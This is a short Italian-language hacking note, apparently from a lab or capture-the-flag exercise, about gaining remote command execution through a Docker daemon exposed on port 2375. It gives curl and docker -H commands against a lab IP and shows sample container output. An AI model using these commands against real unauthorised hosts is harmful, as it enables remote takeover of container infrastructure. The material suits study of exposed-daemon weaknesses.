tags: docker Docker_Hacking RCE_Esposizione_Demone_Docker
Quando tramite una scansione Nmap ci appare come risultato la porta 2375 aperta come nel seguente esempio:

è possibile eseguire comandi Docker dalla nostra macchina attaccante perchè quel servizio si occupa di convertire e trasferire i comandi Socket UNIX in comandi Socket TCP/IP permettendo di eseguire comandi Docker da remoto.
Per confermare che abbiamo accesso al demone possiamo utlizzare il seguente comando:
curl http://10.10.22.154:2375/versionPer eseguire comandi veri e propri possiamo utilizzare la seguente sintassi:
docker -H tcp://10.10.22.154:2375 ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
63b932f4d7d2 privileged-container "/usr/sbin/sshd -D" 5 years ago Up About an hour 0.0.0.0:2244->22/tcp musing_stonebraker
2b28b54f56f6 namespaces "/usr/sbin/sshd -D" 5 years ago Up About an hour 0.0.0.0:2255->22/tcp goofy_diffie
3d8fe1db6635 container-socket "/usr/sbin/sshd -D" 5 years ago Up About an hour 0.0.0.0:2233->22/tcp brave_mendel
fd1d7cc1b972 registry:2 "/entrypoint.sh /etc…" 5 years ago Up About an hour 0.0.0.0:5000->5000/tcp registry_example-registry_1
c5bd077f9ddb registry:2 "/entrypoint.sh /etc…" 5 years ago Up About an hour 0.0.0.0:7000->5000/tcp registry_actual-registry-1_1
Altri comandi utili potrebbero essere:
-
network ls -
images -
exec -
run